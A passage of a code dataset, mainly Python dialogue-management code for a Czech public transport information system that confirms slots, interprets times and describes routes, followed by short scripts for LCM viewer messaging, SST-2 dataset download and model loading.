confirmed_slots, ds, accepted_slots):\n \"\"\"Return a DA containing information about all slots being confirmed\n by the user (confirm/deny).\n\n Update the current dialogue state regarding the information provided.\n\n *WARNING* This confirms only against values in the dialogue state; however, in some cases it should also\n confirm against the results obtained from the database, e.g. the 
departure_time slot.\n\n :param ds: The current dialogue state\n :param confirmed_slots: A dictionary with keys for all slots \\\n being confirmed, along with their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in confirmed_slots:\n if confirmed_slots[slot].mpv() == ds[slot].mpv():\n # it is as user expected\n res_da.append(DialogueActItem(\"affirm\"))\n dai = DialogueActItem(\"inform\", slot, ds[slot].mpv())\n res_da.append(dai)\n else:\n # it is something else than what user expected\n res_da.append(DialogueActItem(\"negate\"))\n dai = DialogueActItem(\"deny\", slot, ds[\"ch_\" + slot].mpv())\n res_da.append(dai)\n\n if slot in accepted_slots:\n dai = DialogueActItem(\"inform\", slot, ds[slot].mpv())\n res_da.append(dai)\n\n ds[\"ch_\" + slot].reset()\n\n return res_da\n\n def confirm_info(self, tobe_confirmed_slots):\n \"\"\"Return a DA confirming only one of the slots to be confirmed.\n Confirm the slot with the most probable value among all slots to be confirmed.\n\n :param tobe_confirmed_slots: A dictionary with keys for all slots \\\n that should be confirmed, along with their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for _, slot in sorted([(h.mpvp(), s) for s, h in tobe_confirmed_slots.items()], reverse=True):\n dai = DialogueActItem(\"confirm\", slot, tobe_confirmed_slots[slot].mpv())\n res_da.append(dai)\n # confirm explicitly only one slot at a time\n break\n return res_da\n\n def select_info(self, tobe_selected_slots):\n \"\"\"Return a DA containing a select act for the two most probable values of just one\n of the slots to be used for the select DAI.\n\n :param tobe_selected_slots: A dictionary with keys for all slots \\\n for which the two most probable values should be selected\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in tobe_selected_slots:\n val1, val2 = tobe_selected_slots[slot].tmpvs()\n res_da.append(DialogueActItem(\"select\", slot, val1))\n res_da.append(DialogueActItem(\"select\", slot, val2))\n # select values only in one slot at a time\n break\n return res_da\n\n def get_iconfirm_info(self, changed_slots):\n \"\"\"Return a DA containing all needed implicit confirms.\n\n Implicitly confirm all slots provided but not yet confirmed.\n\n This also includes slots changed during the conversation.\n\n :param changed_slots: A dictionary with keys for all slots \\\n that have not been implicitly confirmed, along with \\\n their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n if changed_slots:\n iconf_da = DialogueAct()\n for slot in changed_slots:\n if 'system_iconfirms' in self.ontology['slot_attributes'][slot]:\n dai = DialogueActItem(\"iconfirm\", slot, changed_slots[slot].mpv())\n iconf_da.append(dai)\n res_da.extend(iconf_da)\n return res_da\n\n def get_default_stop_for_city(self, city):\n \"\"\"Return a `default' stop based on the city name (main bus/train station).\n\n :param city: city name (unicode)\n :rtype: unicode\n \"\"\"\n stops = self.ontology.get_compatible_vals('city_stop', city)\n for cand_stop_name in [city, 'Hlavní nádraží', 'CAN, Husova']:\n if cand_stop_name in stops:\n return cand_stop_name\n for cand_stop_suffix in [' hlavní nádraží', ' město', ' střed',\n ', nádraží', ', autobusové stanoviště',\n ', železniční zastávka', ', železniční stanice',\n ', radnice', ', náměstí', ', centrum', ', obec',\n ', náves', ', obecní úřad', ', škola', ', kostel',\n ', rozcestí', ', hostinec']:\n stop = city + cand_stop_suffix\n if stop in stops:\n return 
stop\n return None\n\n def get_accepted_mpv(self, ds, slot_name, accepted_slots):\n \"\"\"Return a slot's 'mpv()' (most probable value) if the slot is accepted, and\n return 'none' otherwise.\n Also, convert an mpv of '*' to 'none' since we don't know how to interpret it.\n\n :param ds: Dialogue state\n :param slot_name: The name of the slot to query\n :param accepted_slots: The currently accepted slots of the dialogue state\n :rtype: string\n \"\"\"\n val = 'none'\n if slot_name in accepted_slots:\n val = ds[slot_name].mpv()\n if val == '*':\n val = 'none'\n return val\n\n def gather_connection_info(self, ds, accepted_slots):\n \"\"\"Return a DA requesting further information needed to search\n for traffic directions, a DA with implicit confirmations, and a Travel object containing the known information.\n Infers city names based on stop names and vice versa.\n\n If the request DA is empty, the search for directions may be commenced immediately.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct, DialogueAct, Travel\n \"\"\"\n req_da = DialogueAct()\n\n # retrieve the slot variables\n from_stop_val = self.get_accepted_mpv(ds, 'from_stop', accepted_slots)\n to_stop_val = self.get_accepted_mpv(ds, 'to_stop', accepted_slots)\n from_city_val = self.get_accepted_mpv(ds, 'from_city', accepted_slots)\n to_city_val = self.get_accepted_mpv(ds, 'to_city', accepted_slots)\n vehicle_val = self.get_accepted_mpv(ds, 'vehicle', accepted_slots)\n num_transfers_val = self.get_accepted_mpv(ds, 'num_transfers', accepted_slots)\n\n # infer cities based on stops\n from_cities, to_cities = None, None\n stop_city_inferred = False\n if from_stop_val != 'none' and from_city_val == 'none':\n from_cities = self.ontology.get_compatible_vals('stop_city', from_stop_val)\n if len(from_cities) == 1:\n from_city_val = from_cities.pop()\n stop_city_inferred = True\n if to_stop_val != 'none' and to_city_val == 'none':\n to_cities = self.ontology.get_compatible_vals('stop_city', to_stop_val)\n if len(to_cities) == 1:\n to_city_val = to_cities.pop()\n stop_city_inferred = True\n\n # infer one city based on the other\n if from_stop_val != 'none' and from_city_val == 'none' and to_city_val in from_cities:\n from_city_val = to_city_val\n if to_stop_val != 'none' and to_city_val == 'none' and from_city_val in to_cities:\n to_city_val = from_city_val\n if (to_cities is not None and from_cities is not None and\n from_city_val == 'none' and to_city_val == 'none'):\n # more cities for each side of the route -- try to intersect the lists\n intersect = [c for c in from_cities if c in to_cities]\n if len(intersect) == 1:\n from_city_val = intersect.pop()\n to_city_val = from_city_val\n stop_city_inferred = True\n\n # infer stops based on cities (for Google) or add '__ANY__' to avoid further requests (for CRWS)\n if self.infer_default_stops:\n if from_city_val != 'none' and from_stop_val == 'none':\n from_stop_val = self.get_default_stop_for_city(from_city_val)\n if to_city_val != 'none' and to_stop_val == 'none':\n to_stop_val = self.get_default_stop_for_city(to_city_val)\n else:\n if from_city_val != 'none' and from_stop_val == 'none' and (to_city_val == 'none' or\n from_city_val != to_city_val):\n from_stop_val = '__ANY__'\n if to_city_val != 'none' and to_stop_val == 'none' and (from_city_val == 'none' or\n from_city_val != to_city_val):\n to_stop_val = '__ANY__'\n\n # check all state variables and output one request dialogue act\n # once in a while, request the departure time before requesting the stops\n if from_stop_val == 'none' and to_stop_val == 'none' and ('departure_time' 
not in accepted_slots or\n 'time' not in accepted_slots) and randbool(10):\n req_da.extend(DialogueAct('request(departure_time)'))\n\n # we do not know the stops (and they weren't inferred based on cities)\n elif from_stop_val == 'none' or to_stop_val == 'none':\n if from_stop_val == 'none' and to_stop_val == 'none' and randbool(3):\n req_da.extend(DialogueAct(\"request(from_stop)&request(to_stop)\"))\n elif from_stop_val == 'none':\n req_da.extend(DialogueAct(\"request(from_stop)\"))\n elif to_stop_val == 'none':\n req_da.extend(DialogueAct('request(to_stop)'))\n\n # we know the stops, but we need to know the cities -- ask about them\n elif from_city_val == 'none':\n req_da.extend(DialogueAct('request(from_city)'))\n elif to_city_val == 'none':\n req_da.extend(DialogueAct('request(to_city)'))\n\n # generate implicit confirms if we inferred cities and they are not the same for both stops\n iconfirm_da = DialogueAct()\n if stop_city_inferred and len(req_da) == 0 and from_city_val != to_city_val:\n iconfirm_da.append(DialogueActItem('iconfirm', 'to_city', to_city_val))\n iconfirm_da.append(DialogueActItem('iconfirm', 'from_city', from_city_val))\n\n return req_da, iconfirm_da, Travel(from_city=from_city_val, from_stop=from_stop_val,\n to_city=to_city_val, to_stop=to_stop_val,\n vehicle=vehicle_val, max_transfers=num_transfers_val)\n\n def gather_platform_info(self, ds, accepted_slots):\n \"\"\"Return a DA requesting further information for the platform search.\n\n If the request DA is empty, there is no need to ask further.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct, DialogueAct, PlatformInfo\n \"\"\"\n req_da = DialogueAct()\n\n # retrieve the slot variables\n from_stop_val = (ds['from_stop'].mpv() if 'from_stop' in\n accepted_slots else 'none')\n to_stop_val = (ds['to_stop'].mpv() if 'to_stop' in accepted_slots\n else 'none')\n train_name_val = (ds['train_name'].mpv() if 'train_name' in\n accepted_slots else 'none')\n from_city_val = ds['from_city'].mpv() if 'from_city' in accepted_slots else 'none'\n to_city_val = ds['to_city'].mpv() if 'to_city' in accepted_slots else 'none'\n\n if from_stop_val == 'none' and from_city_val == 'none':\n req_da.extend(DialogueAct('request(from_stop)'))\n elif (to_stop_val == 'none' and to_city_val == 'none') and \\\n train_name_val == 'none':\n req_da.extend(DialogueAct('request(to_stop)&request(train_name)'))\n\n # generate implicit confirms if we inferred cities and they are not the same for both stops\n iconfirm_da = DialogueAct()\n\n directions = None\n if ds.directions:\n directions = ds.directions[ds.route_alternative]\n\n pi = PlatformInfo(from_stop=from_stop_val,\n to_stop=to_stop_val,\n from_city=from_city_val,\n to_city=to_city_val,\n train_name=train_name_val,\n directions=directions)\n return req_da, iconfirm_da, pi\n\n def req_current_time(self):\n \"\"\"Generates a dialogue act informing about the current time.\n :rtype: DialogueAct\n \"\"\"\n cur_time = datetime.now()\n return DialogueAct('inform(current_time=%d:%02d)' % (cur_time.hour, cur_time.minute))\n\n def req_from_stop(self, ds):\n \"\"\"Generates a dialogue act informing about the origin stop of the last\n recommended connection.\n\n TODO: this gives too much information. It might be worth splitting this into several dialogue acts\n and letting the user ask for all the individual pieces of information. 
The good thing would be that it would lead\n to longer dialogues.\n\n :rtype: DialogueAct\n \"\"\"\n route = ds.directions[ds.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n da.append(DialogueActItem('inform', 'vehicle', step.vehicle))\n da.append(DialogueActItem('inform', 'line', step.line_name))\n da.append(DialogueActItem('inform', 'headsign', step.headsign))\n break\n return da\n\n def req_to_stop(self, ds):\n \"\"\"Return a DA informing about the destination stop of the last\n recommended connection.\n \"\"\"\n route = ds.directions[ds.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n break\n return da\n\n def req_departure_time(self, dialogue_state):\n \"\"\"Generates a dialogue act informing about the departure time from the origin stop of the last\n recommended connection.\n\n :rtype: DialogueAct\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n da.append(DialogueActItem('inform', 'departure_time', step.departure_time.strftime(\"%H:%M\")))\n break\n return da\n\n def req_departure_time_rel(self, dialogue_state):\n \"\"\"Return a DA informing the user about the relative time until the\n last recommended connection departs.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n # construct relative time from now to departure\n now = datetime.now()\n now -= timedelta(seconds=now.second, microseconds=now.microsecond) # floor to minute start\n departure_time_rel = (step.departure_time - now)\n\n # the connection was missed\n if departure_time_rel.days < 0:\n da.append(DialogueActItem('apology'))\n da.append(DialogueActItem('inform', 'missed_connection', 'true'))\n # the connection is right now\n elif departure_time_rel.days == 0 and departure_time_rel.seconds == 0:\n da.append(DialogueActItem('inform', 'departure_time_rel', 'now'))\n # future connections\n else:\n da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n departure_time_rel_hrs, departure_time_rel_mins = divmod(departure_time_rel.seconds / 60, 60)\n if departure_time_rel.days > 0:\n departure_time_rel_hrs += 24 * departure_time_rel.days\n da.append(DialogueActItem('inform', 'departure_time_rel',\n '%d:%02d' % (departure_time_rel_hrs, departure_time_rel_mins)))\n break\n return da\n\n def req_arrival_time(self, dialogue_state):\n \"\"\"Return a DA informing about the arrival time at the destination stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n da.append(DialogueActItem('inform', 'arrival_time', step.arrival_time.strftime(\"%H:%M\")))\n break\n return da\n\n def req_arrival_time_rel(self, dialogue_state):\n \"\"\"Return a DA informing about the relative arrival time at the destination 
stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n # construct relative time from now to arrival\n arrival_time_rel = (step.arrival_time - datetime.now()).seconds / 60\n arrival_time_rel_hrs, arrival_time_rel_mins = divmod(arrival_time_rel, 60)\n da.append(DialogueActItem('inform', 'arrival_time_rel',\n '%d:%02d' % (arrival_time_rel_hrs, arrival_time_rel_mins)))\n break\n return da\n\n def req_duration(self, dialogue_state):\n \"\"\"Return a DA informing about the journey time to the destination stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n departure_time = step.departure_time\n break\n else:\n departure_time = datetime.fromtimestamp(0)\n\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n arrival_time = step.arrival_time\n break\n else:\n arrival_time = datetime.fromtimestamp(leg.steps[0].duration)\n\n duration = (arrival_time - departure_time).seconds / 60\n duration_hrs, duration_mins = divmod(duration, 60)\n da.append(DialogueActItem('inform', 'duration', '%d:%02d' % (duration_hrs, duration_mins)))\n return da\n\n def req_num_transfers(self, dialogue_state):\n \"\"\"Return a DA informing the user about the number of transfers in the\n last recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n n = sum([1 for step in leg.steps if step.travel_mode == step.MODE_TRANSIT]) - 1\n da = DialogueAct('inform(num_transfers=\"%d\")' % n)\n return da\n\n def req_time_transfers(self, dialogue_state):\n \"\"\"Return a DA informing the user about transfer places and the time needed for the transfer in the\n last recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n # keep only the transit steps (those using some means of transport)\n transits = [step for step in route.legs[0].steps if step.travel_mode == step.MODE_TRANSIT]\n\n # get_time computes the difference between two datetime objects and returns it as an 'h:mm' string\n get_time = lambda f, t: '%d:%02d' % divmod(((t - f).seconds / 60), 60)\n # calculate the time needed as \"departure time of the following vehicle minus arrival time at the stop\"\n n = [(arrive_at.arrival_stop, get_time(arrive_at.arrival_time, depart_from.departure_time))\n for arrive_at, depart_from in itertools.izip(transits, transits[1:])]\n names = ['inform(time_transfers_stop=\"%s\")&inform(time_transfers_limit=\"%s\")' % tuple_n for tuple_n in n]\n\n da = DialogueAct(\"&\".join(names)) if len(names) > 0 else DialogueAct('inform(num_transfers=\"0\")')\n return da\n\n def check_directions_conflict(self, wp):\n \"\"\"Check for conflicts in the given waypoints. 
Return an apology() DA if the origin and\n the destination are the same, or if a city is not compatible with the corresponding stop.\n\n :param wp: waypoints of the user's connection query\n :rtype: DialogueAct\n :return: apology dialogue act in case of conflict, or None\n \"\"\"\n # origin and destination are the same\n if (wp.from_city == wp.to_city) and (wp.from_stop in [wp.to_stop, None]):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"thesame\")')\n apology_da.extend(DialogueAct('inform(from_stop=\"%s\")&inform(to_stop=\"%s\")' %\n (wp.from_stop, wp.to_stop)))\n return apology_da\n # origin stop incompatible with origin city\n elif not self.ontology.is_compatible('city_stop', wp.from_city, wp.from_stop):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"incompatible\")')\n apology_da.extend(DialogueAct('inform(from_city=\"%s\")&inform(from_stop=\"%s\")' %\n (wp.from_city, wp.from_stop)))\n return apology_da\n # destination stop incompatible with destination city\n elif not self.ontology.is_compatible('city_stop', wp.to_city, wp.to_stop):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"incompatible\")')\n apology_da.extend(DialogueAct('inform(to_city=\"%s\")&inform(to_stop=\"%s\")' %\n (wp.to_city, wp.to_stop)))\n return apology_da\n return None\n\n def get_directions(self, ds, route_type='true', check_conflict=False):\n \"\"\"Retrieve Google directions, save them to the dialogue state and return\n corresponding DAs.\n\n Responsible for the interpretation of AM/PM time expressions.\n\n :param ds: The current dialogue state\n :param route_type: a label for the found route (to be passed on to \\\n :func:`say_directions`)\n :param check_conflict: If True, will check if the origin and \\\n destination stops are different and issue a warning DA if not.\n :rtype: DialogueAct\n \"\"\"\n conn_info = ds.conn_info\n # check for route conflicts\n if check_conflict:\n apology_da = self.check_directions_conflict(conn_info)\n if apology_da is not None:\n if ds.route_alternative is not None:\n ds.directions = None\n ds.route_alternative = None\n return apology_da\n\n # get dialogue state values\n departure_time = ds['departure_time'].mpv()\n departure_time_rel = ds['departure_time_rel'].mpv()\n arrival_time = ds['arrival_time'].mpv()\n arrival_time_rel = ds['arrival_time_rel'].mpv()\n date_rel = ds['date_rel'].mpv()\n ampm = ds['ampm'].mpv()\n time = ds['time'].mpv()\n time_rel = ds['time_rel'].mpv()\n\n # interpret departure and arrival time\n departure_ts, arrival_ts = None, None\n if arrival_time != 'none' or arrival_time_rel != 'none':\n arrival_ts, _ = self.interpret_time(arrival_time, ampm, arrival_time_rel, date_rel,\n ds['lta_arrival_time'].mpv())\n else:\n lta_departure_time = ds['lta_departure_time'].mpv()\n lta_time = ds['lta_time'].mpv()\n lta_time = lta_departure_time if lta_departure_time != 'none' else lta_time\n time_abs = departure_time if departure_time != 'none' else time\n time_rel = departure_time_rel if departure_time_rel != 'none' else time_rel\n departure_ts, _ = self.interpret_time(time_abs, ampm, time_rel, date_rel, lta_time)\n\n # retrieve transit directions\n ds.directions = self.directions.get_directions(conn_info,\n departure_time=departure_ts,\n arrival_time=arrival_ts)\n return self.process_directions_for_output(ds, route_type)\n\n ORIGIN = 'ORIGIN'\n DESTIN = 'FINAL_DEST'\n\n def process_directions_for_output(self, dialogue_state, route_type):\n \"\"\"Return DAs for the directions in the current dialogue state.\n If the directions 
are not valid (nothing found), delete their object from the\n dialogue state and return apology DAs.\n\n :param dialogue_state: the current dialogue state\n :param route_type: the route type requested by the user (\"last\", \"next\" etc.)\n :rtype: DialogueAct\n \"\"\"\n if dialogue_state.route_alternative is None:\n dialogue_state.route_alternative = 0\n\n try:\n # get the alternative we want to say now\n route = dialogue_state.directions[dialogue_state.route_alternative]\n # only 1 leg should be present in case we have no waypoints\n steps = route.legs[0].steps\n except IndexError:\n # this will lead to apology that no route has been found\n steps = []\n #dialogue_state.directions = None\n dialogue_state.route_alternative = None\n\n res = []\n\n # introduction\n if len(dialogue_state.directions) > 1:\n res.append('inform(found_directions=\"%s\")' % route_type)\n if route_type != \"last\":\n res.append(\"inform(alternative=%d)\" % (dialogue_state.route_alternative + 1))\n\n # route description\n prev_arrive_stop = self.ORIGIN # remember previous arrival stop\n for step_ndx, step in enumerate(steps):\n\n # find out what will be the next departure stop (needed later)\n next_leave_stop = self.DESTIN\n if step_ndx < len(steps) - 2 and \\\n steps[step_ndx + 1].travel_mode == step.MODE_WALKING:\n next_leave_stop = steps[step_ndx + 2].departure_stop\n elif step_ndx < len(steps) - 1 and \\\n steps[step_ndx + 1].travel_mode == step.MODE_TRANSIT:\n next_leave_stop = steps[step_ndx + 1].departure_stop\n\n # walking\n if step.travel_mode == step.MODE_WALKING:\n # walking to stops with different names\n if (next_leave_stop == self.DESTIN and\n prev_arrive_stop != dialogue_state.directions.to_stop) or \\\n (prev_arrive_stop == self.ORIGIN and\n next_leave_stop != dialogue_state.directions.from_stop) or \\\n (next_leave_stop != self.DESTIN and\n prev_arrive_stop != self.ORIGIN and\n next_leave_stop != prev_arrive_stop):\n # walking destination: next departure stop\n res.append(\"inform(walk_to=%s)\" % next_leave_stop)\n #res.append(\"inform(duration=0:%02d)\" % (step.duration / 60))\n # public transport\n elif step.travel_mode == step.MODE_TRANSIT:\n res.append(\"inform(vehicle=%s)\" % step.vehicle)\n res.append(\"inform(line=%s)\" % step.line_name)\n res.append(\"inform(departure_time=%s)\" %\n step.departure_time.strftime(\"%H:%M\"))\n # only mention departure if it differs from previous arrival\n if step.departure_stop != prev_arrive_stop:\n res.append(\"inform(enter_at=%s)\" % step.departure_stop)\n res.append(\"inform(headsign=%s)\" % step.headsign)\n res.append(\"inform(exit_at=%s)\" % step.arrival_stop)\n # only mention transfer if there is one\n if next_leave_stop != self.DESTIN:\n res.append(\"inform(transfer='true')\")\n prev_arrive_stop = step.arrival_stop\n\n # no route found: apologize\n if len(res) == 0:\n res.append('apology()')\n res.append(dialogue_state.directions.get_minimal_info())\n\n res_da = DialogueAct(\"&\".join(res))\n\n return res_da\n\n DEFAULT_AMPM_TIMES = {'morning': \"06:00\",\n 'am': \"10:00\",\n 'pm': \"15:00\",\n 'evening': \"18:00\",\n 'night': \"00:00\"}\n\n def interpret_time(self, time_abs, time_ampm, time_rel, date_rel, lta_time):\n \"\"\"Interpret time, given current dialogue state most probable values for\n relative and absolute time and date, plus the corresponding last-talked-about value.\n\n :return: the inferred time value + flag indicating the inferred time type ('abs' or 'rel')\n :rtype: tuple(datetime, string)\n \"\"\"\n now = datetime.now()\n now += 
timedelta(seconds=(60 - now.second), microseconds=(-now.microsecond)) # round to next minute start\n\n # use only last-talked-about time (of any type -- departure/arrival)\n if (time_abs != 'none' or date_rel != 'none') and time_rel != 'none':\n if lta_time.endswith('time_rel'):\n time_abs = 'none'\n date_rel = 'none'\n elif lta_time.endswith('time') or lta_time == 'date_rel':\n time_rel = 'none'\n\n # remove bogus values (i.e. \"now\") from time_abs\n if not re.match('^[0-2]?[0-9]:[0-5][0-9]$', time_abs):\n time_abs = 'none'\n\n # relative time\n if (time_abs == 'none' and time_ampm == 'none' and date_rel == 'none') or time_rel != 'none':\n time_type = 'rel'\n time_abs = now\n if time_rel not in ['none', 'now']:\n trel_parse = datetime.strptime(time_rel, \"%H:%M\")\n time_abs += timedelta(hours=trel_parse.hour, minutes=trel_parse.minute)\n # absolute time (with relative date)\n else:\n time_type = 'abs'\n if time_abs == 'none':\n if time_ampm != 'none':\n time_abs = self.DEFAULT_AMPM_TIMES[time_ampm]\n elif date_rel != 'none':\n time_abs = \"%02d:%02d\" % (now.hour, now.minute)\n time_parsed = datetime.combine(now, datetime.strptime(time_abs, \"%H:%M\").time())\n time_hour = time_parsed.hour\n now_hour = now.hour\n # handle 12hr time\n if time_hour >= 1 and time_hour <= 12:\n # interpret AM/PM\n if time_ampm != 'none':\n # 'pm' ~ 12pm till 11:59pm\n if time_ampm == 'pm' and time_hour < 12:\n time_hour += 12\n # 'am'/'morning' ~ 12am till 11:59am\n elif time_ampm in ['am', 'morning'] and time_hour == 12:\n time_hour = 0\n # 'evening' ~ 4pm till 3:59am\n elif time_ampm == 'evening' and time_hour >= 4:\n time_hour = (time_hour + 12) % 24\n # 'night' ~ 6pm till 5:59am\n elif time_ampm == 'night' and time_hour >= 6:\n time_hour = (time_hour + 12) % 24\n # 12hr time + no AM/PM set + today or no date set: default to next 12hrs\n elif date_rel in ['none', 'today'] and now_hour > time_hour and now_hour < time_hour + 12:\n time_hour = (time_hour + 12) % 24\n time_abs = datetime.combine(now, dttime(time_hour, time_parsed.minute))\n # relative date\n if date_rel == 'tomorrow':\n time_abs += timedelta(days=1)\n elif date_rel == 'day_after_tomorrow':\n time_abs += timedelta(days=2)\n elif time_abs < now:\n time_abs += timedelta(days=1)\n\n return time_abs, time_type\n\n def get_limited_context_help(self, dialogue_state):\n res_da = DialogueAct()\n\n # if we do not understand the input then provide the context sensitive help\n if dialogue_state.route_alternative is None:\n # before something is offered\n if randbool(10):\n res_da.append(DialogueActItem(\"help\", \"task\", \"weather\"))\n elif randbool(10):\n res_da.append(DialogueActItem(\"help\", \"request\", \"current_time\"))\n elif randbool(10):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"hangup\"))\n elif randbool(9):\n res_da.append(DialogueActItem(\"help\", \"request\", \"help\"))\n elif randbool(8):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"departure_time\"))\n elif randbool(7):\n res_da.append(DialogueActItem(\"help\", \"repeat\"))\n elif not dialogue_state['from_stop'].test(\"none\", self.accept_prob, neg_val=True):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"from_stop\"))\n elif not dialogue_state['to_stop'].test(\"none\", self.accept_prob, neg_val=True):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"to_stop\"))\n else:\n res_da.append(DialogueActItem(\"silence\"))\n else:\n # we already offered a connection\n if randbool(4):\n res_da.append(DialogueActItem(\"help\", \"inform\", 
\"alternative_last\"))\n elif randbool(7):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_next\"))\n elif randbool(6):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_prev\"))\n elif randbool(5):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_abs\"))\n elif randbool(4):\n res_da.append(DialogueActItem(\"help\", \"request\", \"from_stop\"))\n elif randbool(3):\n res_da.append(DialogueActItem(\"help\", \"request\", \"to_stop\"))\n elif randbool(2):\n res_da.append(DialogueActItem(\"help\", \"request\", \"num_transfers\"))\n else:\n res_da.append(DialogueActItem(\"silence\"))\n\n return res_da\n","repo_name":"UFAL-DSG/alex","sub_path":"alex/applications/PublicTransportInfoCS/hdc_policy.py","file_name":"hdc_policy.py","file_ext":"py","file_size_in_byte":63719,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"52"} +{"seq_id":"72327757284","text":"import sys\nsys.path.append('/usr/local/lib/python2.7/site-packages')\nimport lcm\nimport time\nimport json\n\nfrom robotlocomotion import viewer2_comms_t\n\nlc = lcm.LCM()\n\nmsg = viewer2_comms_t()\n\nmsg.format = \"treeviewer_json\"\nmsg.format_version_major = 1\nmsg.format_version_minor = 0\ndata_payload = json.dumps({\n \"timestamp\": 1486691399249288,\n \"setgeometry\": [\n {\n \"path\": [\"box_mass\"],\n \"geometry\": {\n \"type\": \"sphere\",\n \"color\": [1, 0, 0, 0.5],\n \"radius\": 0.2\n }\n }\n ],\n \"settransform\": [\n {\n \"path\": [\"box_mass\"],\n \"transform\": {\n \"translation\": [0.00745367, -0.000964868, 0.960629],\n \"quaternion\": [1, 0, 0, 0]\n }\n }\n ],\n \"delete\": []\n})\n\n# 0.00745367\n# -0.000964868\n# 0.960629\n\nmsg.data = data_payload\nmsg.num_bytes = len(data_payload)\n\n# lc.publish(\"DIRECTOR_TREE_VIEWER_REQUEST_<1>\", msg.encode())\n\ndef my_handler(channel, data):\n msg = viewer2_comms_t.decode(data)\n print(\"Received message on channel \\\"%s\\\"\" % channel)\n print(\" format = %s\" % str(msg.format))\n # print(\" position = %s\" % str(msg.position))\n # print(\" orientation = %s\" % str(msg.orientation))\n # print(\" ranges: %s\" % str(msg.ranges))\n # print(\" name = '%s'\" % msg.name)\n # print(\" enabled = %s\" % str(msg.enabled))\n print(\"\")\n\nsubscription = lc.subscribe(\"DIRECTOR_TREE_VIEWER_RESPONSE_\", my_handler)\n\ntry:\n while True:\n lc.publish(\"DIRECTOR_TREE_VIEWER_REQUEST_\", msg.encode())\n lc.handle_timeout(1000)\nexcept KeyboardInterrupt:\n pass\n\nlc.unsubscribe(subscription)\n","repo_name":"ethanweber/valkyrie_project","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73806540004","text":"\nfrom datasets import load_dataset\nraw_datasets = load_dataset(\n \"glue\",\n \"sst2\",\n cache_dir=\"./downloaded_sst2\"\n)\n\n# get the validation dataset\nval_dataset = raw_datasets[\"validation\"]\n\n# save the val dataset to a csv file\nval_dataset.to_csv(\"val_dataset.csv\", index=False)","repo_name":"Jadiker/5980-hw1-public","sub_path":"download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35346830027","text":"import xgboost as xgb\nimport lightgbm as lgb\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport logging\n\nfrom execution_framework.utils.common_utils import 
read_variables, read_configuration_file\nfrom execution_framework.utils.preprocess_utils import normalize_data\nfrom execution_framework.utils.stats_utils import discretize_data\n\nfrom typing import Union\nfrom sklearn.cluster import KMeans\n\n\nlogger = logging.getLogger('MODEL PREDICTION')\n\n# Declare model types\nmodels = Union[xgb.Booster, lgb.LGBMClassifier, KMeans]\n\n\ndef load_model(trained_model_path: str, model_type: str, model_estimator: str) -> models:\n \"\"\"\n Read a trained model object from disk\n\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of the model, e.g. lightgbm, xgboost, kmeans\n :return: model object\n \"\"\"\n\n logger.info(\"Loading trained model object from '{}'\".format(trained_model_path))\n\n if model_type == 'classification':\n\n if model_estimator == 'lightgbm':\n trained_model = pickle.load(open(trained_model_path, 'rb'))\n\n elif model_estimator == 'xgboost':\n trained_model = xgb.Booster(model_file=trained_model_path)\n\n else:\n logger.error(f\"{model_estimator} model is not supported in classification yet\")\n raise NotImplementedError('Model estimators supported in classification for now: lightgbm and 